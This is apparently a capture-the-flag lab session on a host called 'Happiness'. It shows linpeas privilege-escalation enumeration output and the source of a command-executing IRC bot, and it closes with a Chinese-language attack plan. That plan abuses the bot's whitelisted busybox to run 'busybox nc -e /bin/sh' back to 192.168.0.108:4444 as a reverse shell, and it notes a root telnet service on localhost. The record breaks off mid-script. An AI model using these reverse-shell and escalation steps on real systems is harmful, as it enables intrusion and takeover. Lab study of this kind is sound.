/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
/etc/ssl/certs/ca-certificates.crt
/etc/ssl/certs/CA_Disig_Root_R2.pem
/etc/ssl/certs/Certigna.pem
/etc/ssl/certs/Certigna_Root_CA.pem
12580PSTORAGE_CERTSBIN

══╣ Writable ssh and gpg agents
/etc/systemd/user/sockets.target.wants/gpg-agent.socket 
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
══╣ Some home ssh config file was found
/usr/share/openssh/sshd_config                          
Include /etc/ssh/sshd_config.d/*.conf
ChallengeResponseAuthentication no
UsePAM yes
X11Forwarding yes
PrintMotd no
AcceptEnv LANG LC_*
Subsystem       sftp    /usr/lib/openssh/sftp-server
══╣ /etc/hosts.allow file found, trying to read the rules:                                                      
/etc/hosts.allow                                        
Searching inside /etc/ssh/ssh_config for interesting info
Include /etc/ssh/ssh_config.d/*.conf
Host *
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
                      ╔════════════════════════════════════╗                                                    
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════                              
                      ╚════════════════════════════════════╝                                                    
╔══════════╣ SUID - Check easy privesc, exploits and write perms                                                
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                 
strace Not Found                                        
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh   
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10                                        
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20                                      
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 47K Apr  6  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8                                             
-rwsr-xr-x 1 root root 63K Apr  6  2024 /usr/bin/su
-rwsr-xr-x 1 root root 35K Apr  6  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)                               
-rwsr-xr-x 1 root root 23K Jan 13  2022 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034                          
-rwsr-xr-x 1 root root 179K Jan 14  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable           
-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)                  
-rwsr-xr-- 1 root messagebus 51K Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device                                       
-rwsr-xr-x 1 root root 471K Dec 21  2023 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 19K Jan 13  2022 /usr/libexec/polkit-agent-helper-1                                      
╔══════════╣ SGID
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid                 
-rwxr-sr-x 1 root shadow 39K Feb 14  2019 /usr/sbin/unix_chkpwd                                                 
-rwxr-sr-x 1 root ssh 347K Dec 21  2023 /usr/bin/ssh-agent                                                      
-rwxr-sr-x 1 root shadow 71K Jul 27  2018 /usr/bin/chage
-rwxr-sr-x 1 root shadow 31K Jul 27  2018 /usr/bin/expiry                                                       
-rwxr-sr-x 1 root tty 15K May  4  2018 /usr/bin/bsd-write                                                       
-rwxr-sr-x 1 root crontab 43K Oct 11  2019 /usr/bin/crontab                                                     
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls                          
files with acls in searched folders Not Found                                     
╔══════════╣ Capabilities
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities                  
══╣ Current shell capabilities                          
./linpeas.sh: 7794: ./linpeas.sh: [[: not found         
CapInh:  [Invalid capability format]
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
CapPrm:  [Invalid capability format]
./linpeas.sh: 7785: ./linpeas.sh: [[: not found
CapEff:  [Invalid capability format]
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
CapBnd:  [Invalid capability format]
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
CapAmb:  [Invalid capability format]

╚ Parent process capabilities
./linpeas.sh: 7819: ./linpeas.sh: [[: not found         
CapInh:  [Invalid capability format]
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
CapPrm:  [Invalid capability format]
./linpeas.sh: 7810: ./linpeas.sh: [[: not found
CapEff:  [Invalid capability format]
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
CapBnd:  [Invalid capability format]
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
CapAmb:  [Invalid capability format]
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

╔══════════╣ Checking misconfigurations of ld.so
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso                          
/etc/ld.so.conf                                         
Content of /etc/ld.so.conf:                             
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf      
  - /usr/lib/x86_64-linux-gnu/libfakeroot               
  /etc/ld.so.conf.d/libc.conf
  - /usr/local/lib                                      
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
  - /usr/local/lib/x86_64-linux-gnu                     
  - /lib/x86_64-linux-gnu
  - /usr/lib/x86_64-linux-gnu

/etc/ld.so.preload
╔══════════╣ Files (scripts) in /etc/profile.d/         
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files                
total 8                                                 
drwxr-xr-x  2 root root 4096 Sep  3  2022 .
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..

╔══════════╣ Permissions in init, init.d, systemd, and rc.d                                                     
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd    
                                                        
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root  729 Nov 13  2020 usr.sbin.inspircd

═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No            
═╣ Credentials in fstab/mtab? ........... No            
═╣ Can I read shadow files? ............. No            
═╣ Can I read shadow plists? ............ No            
═╣ Can I write shadow plists? ........... No            
═╣ Can I read opasswd file? ............. No            
═╣ Can I write in network-scripts? ...... No            
═╣ Can I read root folder? .............. No            
                                                        
╔══════════╣ Searching root files in home dirs (limit 30)                                                       
/home/                                                  
/root/
/var/www
/var/www/html/uploads/syz.png
/var/www/localhost/index.html

╔══════════╣ Searching folders owned by me containing others files on it (limit 100)                            
                                                        
╔══════════╣ Readable files belonging to root and readable by me but not world readable                         
                                                        
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)             
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files                
/dev/mqueue                                             
/dev/shm
/home/Eecho
/run/lock
/run/user/1000
/run/user/1000/dbus-1
/run/user/1000/dbus-1/services
/run/user/1000/gnupg
/run/user/1000/systemd
/run/user/1000/systemd/inaccessible
/run/user/1000/systemd/inaccessible/dir
/run/user/1000/systemd/inaccessible/reg
/run/user/1000/systemd/units
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/usr/local/bin/irc_bot.py
/var/lib/php/sessions
/var/tmp
/var/www/html/shell.php

╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)                                           
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files                
                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════                             
                            ╚═════════════════════════╝ 
╔══════════╣ .sh files in path
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path        
/usr/bin/gettext.sh                                     

╔══════════╣ Executable files potentially added by user (limit 70)                                              
2026-01-22+11:35:24.8002567090 /var/www/html/index.php  
2025-04-11+22:22:32.8990844810 /etc/grub.d/10_linux
2025-04-11+22:07:00.9628442610 /etc/grub.d/40_custom
2025-04-05+08:32:38.1253354200 /usr/local/bin/irc_bot.py
2025-04-01+03:55:32.0919414020 /usr/local/bin/calc-prorate

╔══════════╣ Unexpected in /opt (usually empty)
total 12                                                
drwxr-xr-x  2 root root 4096 Jan 22 12:29 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
-rw-r--r--  1 root root   31 Jan 22 12:29 Eecho_pass.txt

╔══════════╣ Unexpected in root
/initrd.img.old                                         
/vmlinuz.old
/vmlinuz
/initrd.img

╔══════════╣ Modified interesting files in the last 5mins (limit 100)                                           
/home/Eecho/.gnupg/trustdb.gpg                          
/home/Eecho/.gnupg/pubring.kbx
/var/log/syslog
/var/log/auth.log
/var/log/daemon.log
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/system.journal
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/user-1000.journal

╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation        
logrotate 3.14.0                                        

    Default mail command:       /usr/bin/mail
    Default compress command:   /bin/gzip
    Default uncompress command: /bin/gunzip
    Default compress extension: .gz
    Default state file path:    /var/lib/logrotate/status
    ACL support:                yes
    SELinux support:            yes
╔══════════╣ Syslog configuration (limit 50)
                                                        


module(load="imuxsock") # provides support for local system logging                                             
module(load="imklog")   # provides kernel logging support                                                       





$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat

$FileOwner root
$FileGroup adm
$FileCreateMode 0640
$DirCreateMode 0755
$Umask 0022

$WorkDirectory /var/spool/rsyslog

$IncludeConfig /etc/rsyslog.d/*.conf



auth,authpriv.*                 /var/log/auth.log
*.*;auth,authpriv.none          -/var/log/syslog
daemon.*                        -/var/log/daemon.log
kern.*                          -/var/log/kern.log
lpr.*                           -/var/log/lpr.log
mail.*                          -/var/log/mail.log
user.*                          -/var/log/user.log

mail.info                       -/var/log/mail.info
mail.warn                       -/var/log/mail.warn
mail.err                        /var/log/mail.err

*.=debug;\
        auth,authpriv.none;\
        news.none;mail.none     -/var/log/debug
*.=info;*.=notice;*.=warn;\
        auth,authpriv.none;\
        cron,daemon.none;\
        mail,news.none          -/var/log/messages

*.emerg                         :omusrmsg:*
╔══════════╣ Auditd configuration (limit 50)
auditd configuration Not Found                          
╔══════════╣ Log files with potentially weak perms (limit 50)                                                   
   133959     36 -rw-r-----   1 root     adm         29127 Jan 24 01:26 /var/log/debug                          
   133873    112 -rw-r-----   1 root     adm        106530 Jan 22 10:40 /var/log/daemon.log.1                   
   132336      4 -rw-r-----   1 root     adm          1690 Apr 11  2025 /var/log/user.log.1                     
   130894     12 -rw-r-----   1 root     adm         11876 Mar 31  2025 /var/log/apt/term.log.2.gz              
   133108      0 -rw-r-----   1 root     adm             0 Jan 22 23:43 /var/log/apt/term.log                   
   133311     12 -rw-r-----   1 root     adm         10140 Apr 11  2025 /var/log/apt/term.log.1.gz              
   133841    184 -rw-r-----   1 root     adm        181706 Jan 24 02:02 /var/log/kern.log                       
   130851     12 -rw-r-----   1 root     adm         10400 Jan 24 02:22 /var/log/syslog                         
   133881     24 -rw-r-----   1 root     adm         18561 Jan 22 10:40 /var/log/auth.log.1                     
   130855    224 -rw-r-----   1 root     adm        228576 Apr 11  2025 /var/log/kern.log.2.gz                  
   133942      8 -rw-r-----   1 root     adm          5197 Jan 24 02:22 /var/log/auth.log                       
   133852     88 -rw-r-----   1 root     adm         89768 Apr  5  2025 /var/log/syslog.4.gz                    
   132383      0 -rw-r-----   1 irc      adm             0 Mar 31  2025 /var/log/inspircd.log                   
   130901     60 -rw-r-----   1 root     adm         57994 Jan 24 01:26 /var/log/syslog.1                       
   133518     52 -rw-r-----   1 root     adm         50014 Apr 11  2025 /var/log/daemon.log.2.gz                
   133005     28 -rw-r-----   1 root     adm         26517 Apr  1  2025 /var/log/syslog.7.gz                    
   133892     56 -rw-r-----   1 root     adm         49492 Jan 22 10:40 /var/log/debug.1                        
   133387     16 -rw-r-----   1 root     adm         14763 Apr 11  2025 /var/log/syslog.3.gz                    
   130852      8 -rw-r-----   1 root     adm          7408 Apr 11  2025 /var/log/auth.log.2.gz                  
   134195    108 -rw-r-----   1 root     adm        107576 Jan 22 10:40 /var/log/syslog.2.gz                    
   132238      4 -rw-------   1 irc      irc           328 Mar 31  2025 /var/log/ircd/ircd-hybrid-user.log      
   132234      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-oper.log      
   132224      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-kill.log      
   132227      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-dline.log     
   132240      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-debug.log     
   132226      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-kline.log     
   132233      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-resv.log      
   132231      0 -rw-------   1 irc      irc             0 Mar 30  2025 /var/log/ircd/ircd-hybrid-xline.log     
   132995     44 -rw-r-----   1 root     adm         41915 Apr  3  2025 /var/log/syslog.6.gz                    
   130857     16 -rw-r-----   1 root     adm         13708 Apr 11  2025 /var/log/debug.2.gz                     
   130854     72 -rw-r-----   1 root     adm         68886 Jan 24 02:22 /var/log/daemon.log                     
   130853    196 -rw-r-----   1 root     adm        198715 Apr 11  2025 /var/log/messages.2.gz                  
   133953      4 -rw-r-----   1 root     adm           203 Jan 24 01:53 /var/log/user.log                       
   133960    152 -rw-r-----   1 root     adm        152640 Jan 24 02:02 /var/log/messages                       
   131094     16 -rw-r-----   1 root     adm         13851 Apr  4  2025 /var/log/syslog.5.gz                    
   133899    312 -rw-r-----   1 root     adm        311774 Jan 22 10:40 /var/log/messages.1                     
   133876    356 -rw-r-----   1 root     adm        357157 Jan 22 10:40 /var/log/kern.log.1                     

╔══════════╣ Files inside /home/Eecho (limit 20)
total 4012                                              
drwxr-xr-x 3 Eecho Eecho    4096 Jan 24 02:22 .
drwxr-xr-x 3 root  root     4096 Jan 22 11:51 ..
-rw-r--r-- 1 Eecho Eecho     220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 Eecho Eecho    3526 Apr 18  2019 .bashrc
drwx------ 3 Eecho Eecho    4096 Jan 24 02:22 .gnupg
-rwxrwxrwx 1 Eecho Eecho  971926 Nov 15 10:04 linpeas.sh
-rw-r--r-- 1 Eecho Eecho     807 Apr 18  2019 .profile
-rwxrwxrwx 1 Eecho Eecho 3104768 Jan 11 08:51 pspy64
-rw------- 1 Eecho Eecho      44 Jan 22 12:59 user.txt

╔══════════╣ Files inside others home (limit 20)
/var/www/html/uploads/.htaccess                         
/var/www/html/uploads/mac.png
/var/www/html/uploads/syz.png
/var/www/html/uploads/mac.jpg
/var/www/html/shell.php
/var/www/html/index.php
/var/www/localhost/index.html

╔══════════╣ Searching installed mail applications
                                                        
╔══════════╣ Mails (limit 50)
                                                        
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Jan 24 02:07 /var/backups   
total 44
-rw-r--r-- 1 root root 24014 Jan 22 12:40 apt.extended_states.0
-rw-r--r-- 1 root root  2568 Apr 11  2025 apt.extended_states.1.gz
-rw-r--r-- 1 root root  2556 Apr  4  2025 apt.extended_states.2.gz
-rw-r--r-- 1 root root  2006 Apr  1  2025 apt.extended_states.3.gz
-rw-r--r-- 1 root root  1542 Apr  1  2025 apt.extended_states.4.gz
-rw-r--r-- 1 root root   757 Mar 30  2025 apt.extended_states.5.gz


╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 9731 Jun 30  2022 /usr/lib/modules/4.19.0-21-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9731 Jun 25  2024 /usr/lib/modules/4.19.0-27-amd64/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 416107 Dec 21  2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 194817 Oct  9  2020 /usr/share/doc/x11-common/changelog.Debian.old.gz
-rw-r--r-- 1 root root 1133 Jan 22 12:34 /etc/inetd.conf.bak                                                    

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)                                
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3027002

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
                                                        
╔══════════╣ Web files?(output limit)
/var/www/:                                              
total 16K
drwxr-xr-x  4 root     root     4.0K Jan 22 12:00 .
drwxr-xr-x 13 root     root     4.0K Jan 22 12:27 ..
drwxr-xr-x  3 www-data www-data 4.0K Jan 24 01:53 html
drwxr-xr-x  2 www-data www-data 4.0K Jan 22 13:50 localhost

/var/www/html:
total 24K
drwxr-xr-x 3 www-data www-data 4.0K Jan 24 01:53 .

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)       
-rw-r--r-- 1 root root 0 Jan 24 01:26 /run/network/.ifstate.lock
-rw-r--r-- 1 root root 0 Feb 22  2021 /usr/share/dictionaries-common/site-elisp/.nosearch
-rw-r--r-- 1 Eecho Eecho 220 Apr 18  2019 /home/Eecho/.bash_logout
-rw-r--r-- 1 root root 220 Apr 18  2019 /etc/skel/.bash_logout
-rw------- 1 root root 0 Mar 18  2025 /etc/.pwd.lock
-rw-r--r-- 1 www-data www-data 71 Jan 24 01:48 /var/www/html/uploads/.htaccess

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)                                   
                                                        
╔══════════╣ Searching passwords in history files
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @stats   = stats
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @items   = { _seq_: 1  }
/usr/share/rubygems-integration/all/gems/rake-13.0.3/lib/rake/thread_history_display.rb:      @threads = { _seq_: "A" }

╔══════════╣ Searching *password* or *credential* files in home (limit 70)                                      
/etc/pam.d/common-password                              
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/grub/i386-pc/legacy_password_test.mod
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/ruby/2.7.0/bundler/uri_credentials_filter.rb
/usr/lib/systemd/systemd-reply-password
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-wall.path
/usr/lib/systemd/system/systemd-ask-password-wall.service
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/mysql_clear_password.so
/usr/lib/x86_64-linux-gnu/libmariadb3/plugin/sha256_password.so                                                 
/usr/share/icons/Adwaita/16x16/legacy/dialog-password.png
/usr/share/icons/Adwaita/16x16/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/22x22/legacy/dialog-password.png
/usr/share/icons/Adwaita/24x24/legacy/dialog-password.png
/usr/share/icons/Adwaita/24x24/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/256x256/legacy/dialog-password.png
/usr/share/icons/Adwaita/32x32/legacy/dialog-password.png
/usr/share/icons/Adwaita/32x32/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/48x48/legacy/dialog-password.png
/usr/share/icons/Adwaita/48x48/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/64x64/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/96x96/status/dialog-password-symbolic.symbolic.png
/usr/share/icons/Adwaita/scalable/status/dialog-password-symbolic.svg
/usr/share/man/man1/systemd-ask-password.1.gz
/usr/share/man/man1/systemd-tty-ask-password-agent.1.gz
/usr/share/man/man7/credentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs                                                 
                                                        
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs                                                 
                                                        
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/user-1000.journal matches
/var/log/installer/status:Description: Set up users and passwords                                               

╔══════════╣ Checking all env variables in /proc/*/environ removing duplicates and filtering out useless env vars                                                       
HOME=/home/Eecho                                        
LANG=en_US.UTF-8
_=./linpeas.sh
LISTEN_FDNAMES=dbus.socket
LISTEN_FDS=1
LOGNAME=Eecho
MANAGERPID=12507
NOTIFY_SOCKET=/run/systemd/notify
PWD=/home/Eecho
SHELL=/bin/bash
SHLVL=1
SSH_CLIENT=192.168.0.108 36408 22
SSH_CLIENT=192.168.0.108 39356 22
SSH_CONNECTION=192.168.0.108 36408 192.168.0.106 22
SSH_CONNECTION=192.168.0.108 39356 192.168.0.106 22
SSH_TTY=/dev/pts/0
SSH_TTY=/dev/pts/1
TERM=xterm-256color
USER=Eecho
XDG_RUNTIME_DIR=/run/user/1000


                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                              
                                ╚════════════════╝      
Regexes to search for API keys aren't activated, use param '-r'

Eecho@Happiness:~$ cat /usr/local/bin/irc_bot.py
import irc.bot
import irc.client
import re
import subprocess
import time
import threading

class IRCBot(irc.bot.SingleServerIRCBot):
    def __init__(self, server, port, nickname, channels, command_channel):
        irc.bot.SingleServerIRCBot.__init__(self, [(server, port)], nickname, nickname)
        self.channel_list = channels
        self.command_channel = "#chan1"  # 唯一执行命令的频道
        self.command_channels = ["#chan1", "#chan2", "#chan3", "#chan4", "#chan5"]  # 所有检测命令的频道
        self.command_pattern = re.compile(r':\)$')
        self.allowed_users = {"Todd", "suraxddq", "ll104567"}
        self.number_regex = re.compile(r'^\s*(\d+\s+)*\d+\s*$')
        self.allowed_commands = ["more", "dir", "busybox", "whoami"]
        self.chan6_timer = None  

    def on_welcome(self, connection, event):
        for channel in self.channel_list:
            connection.join(channel)
            print(f"[+] Already joined the channel：{channel}")
        self.start_chan6_timer()

    def start_chan6_timer(self):
        if self.chan6_timer:
            self.chan6_timer.cancel()
        self.chan6_timer = threading.Timer(180.0, self.send_chan6_message)
        self.chan6_timer.start()

    def send_chan6_message(self):
        try:
            if self.connection.is_connected():
                self.connection.privmsg("#chan6", "My friends and I are chatting on it, but we all follow the formatting requirements. Finally, we need to:) End")
                print("[*] Timed reminder has been sent #chan6")
        except Exception as e:
            print(f"[!] Sending timed notification failed：{str(e)}")
        finally:
            self.start_chan6_timer()

    def on_disconnect(self, connection, event):
        if self.chan6_timer:
            self.chan6_timer.cancel()
            self.chan6_timer = None
        super().on_disconnect(connection, event)

    def on_pubmsg(self, connection, event):
        channel = event.target
        user = event.source.nick
        message = event.arguments[0]

        # 检测所有命令频道的消息
        if channel in self.command_channels and self.command_pattern.search(message):
            print(f"[*] Received command：{message} (From users：{user})")
            
            # 格式验证（所有频道通用）
            cmd_part = message.rsplit(':)', 1)[0].strip()
            if not self.number_regex.match(cmd_part):
                connection.privmsg(user, "[!] Format error or presence of illegal characters")
                return
            
            # 非#chan1频道直接返回权限错误
            if channel != self.command_channel:
                connection.privmsg(user, "[!] Error: Command execution not allowed")
                return
            
            # #chan1专属执行流程
            if self.validate_command(user):
                try:
                    numbers = list(map(int, cmd_part.split()))
                    for num in numbers:
                        if num < 0 or num > 255:
                            raise ValueError("[-] Number range exceeds（0-255）")
                    ascii_cmd = ''.join([chr(n) for n in numbers])
                except ValueError as e:
                    connection.privmsg(user, f"[!] conversion error ：{str(e)}")
                    return
                
                if not self.is_command_allowed(ascii_cmd):
                    connection.privmsg(user, f"[!] Wrong command: '{ascii_cmd.split()[0]}' unauthorized!")
                    return

                result = self.execute_command(ascii_cmd)
                if result:
                    safe_result = result.replace('\n', ' ').replace('\r', '')
                    try:
                        connection.privmsg(user, f"[+] COMMAND EXECUTION：{safe_result}")
                    except irc.client.InvalidCharacters:
                        connection.privmsg(user, "[!] Format error or presence of illegal characters")
            else:
                connection.privmsg(user, "[!] Format error or presence of illegal characters")

    def is_command_allowed(self, command):
        parts = command.strip().split()
        if not parts:
            return False
        main_cmd = parts[0]
        return (
            main_cmd in self.allowed_commands and
            not re.search(r'[;&|`]', command)
        )

    def execute_command(self, command):
        try:
            parts = command.strip().split()
            output = subprocess.check_output(
                parts,
                stderr=subprocess.STDOUT,
                universal_newlines=True,
                timeout=10
            )
            return output.strip()[:400].replace('\r', '').replace('\n', ' ')
        except subprocess.CalledProcessError as e:
            return f"[!] Command execution failed：{e.output.strip()}"
        except Exception as e:
            return f"[-] Error：{str(e)}"

    def validate_command(self, user):
        return user in self.allowed_users

def run_bot():
    server = "PyCrt"
    port = 6667
    nickname = "admin"
    channels = ["#chan1", "#chan2", "#chan3", "#chan4", "#chan5", "#chan6"]
    command_channel = "#chan1"

    while True:
        try:
            print("[*] Starting IRC server...")
            bot = IRCBot(server, port, nickname, channels, command_channel)
            bot.start()
        except KeyboardInterrupt:
            print("\n[!] user exit")
            if bot.chan6_timer:
                bot.chan6_timer.cancel()
            break
        except Exception as e:
            print(f"[!] Exception occurred:{str(e)}，Try again in 5 seconds...")
            time.sleep(5)

if __name__ == "__main__":
    run_bot()
Eecho@Happiness:~$ cat /etc/systemd/system/irc_bot.service
[Unit]
Description=IRC Bot Service
After=network.target

[Service]
User=pycrtlake
Group=pycrtlake
WorkingDirectory=/usr/local/bin
ExecStart=/usr/bin/python3 /usr/local/bin/irc_bot.py
Restart=always
RestartSec=5
StandardOutput=syslog
StandardError=syslog
Environment=PYTHONUNBUFFERED=1

[Install]
WantedBy=multi-user.target
Eecho@Happiness:~$ cat /etc/inetd.conf
127.0.0.1:daytime stream tcp nowait root internal
127.0.0.1:daytime dgram udp wait root internal
127.0.0.1:echo stream tcp nowait root internal
127.0.0.1:echo dgram udp wait root internal
127.0.0.1:discard stream tcp nowait root internal
127.0.0.1:discard dgram udp wait root internal
127.0.0.1:time stream tcp nowait root internal
127.0.0.1:time dgram udp wait root internal
127.0.0.1:chargen stream tcp nowait root internal
127.0.0.1:chargen dgram udp wait root internal
127.0.0.1:telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/telnetd
Eecho@Happiness:~$ cat /etc/inetd.conf.bak
# /etc/inetd.conf: see inetd(8) for further informations.
#
# Internet superserver configuration database.
#
#
# Lines starting with "#:LABEL:" or "#<off>#" should not
# be changed unless you know what you are doing!
#
# If you want to disable an entry so it is not touched during
# package updates just comment it out with a single '#' character.
#
# Packages should modify this file by using update-inetd(8).
#
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
#
#:INTERNAL: Internal services
#discard                stream  tcp6    nowait  root   internal
#discard                dgram   udp6    wait    root   internal
#daytime                stream  tcp6    nowait  root   internal
#time           stream  tcp6    nowait  root    internal

#:STANDARD: These are standard services.
#<off># telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  /usr/sbin/telnetd

#:BSD: Shell, login, exec and talk are BSD protocols.

#:MAIL: Mail, news and uucp services.

#:INFO: Info services

#:BOOT: TFTP service is provided primarily for booting.  Most sites
#       run this only on machines acting as "boot servers."

#:RPC: RPC based services

#:HAM-RADIO: amateur-radio services

#:OTHER: Other services

IRC Bot 攻击向量分析

关键点：

IRC Bot 连接到 PyCrt:6667（即 127.0.0.1:6667）
允许的命令：more, dir, busybox, whoami
允许的用户：Todd, suraxddq, ll104567
命令格式：数字（ASCII码）+ :) 结尾
只能在 #chan1 执行命令

重要发现：

busybox 命令被允许 → 可以使用 busybox nc 建立反向shell！
服务以 pycrtlake 用户运行

攻击步骤

1. 检查IRC服务是否运行

ss -tlnp | grep 6667
ps aux | grep irc

2. 安装IRC客户端

which irssi || which nc

3. 连接IRC服务器

nc 127.0.0.1 6667

连接后发送：
NICK Todd
USER Todd 0 * :Todd
JOIN #chan1

命令编码示例

要执行 whoami，需要转换为ASCII：

w=119, h=104, o=111, a=97, m=109, i=105

PRIVMSG #chan1 :119 104 111 97 109 105 :)

获取反向Shell（使用busybox nc）

busybox nc -e /bin/sh 你的IP 端口的ASCII编码：

用Python生成

python3 -c "print(' '.join(str(ord(c)) for c in 'busybox nc -e /bin/sh 192.168.0.108 4444'))"

● IRC服务器没有运行。但是注意看 inetd.conf 里的配置：

127.0.0.1:telnet stream tcp nowait root /usr/sbin/tcpd /usr/sbin/telnetd

Telnet服务以root身份运行在127.0.0.1:23！

直接尝试本地telnet连接

busybox nc 127.0.0.1 23

python3 << 'EOF'
import socket
import time

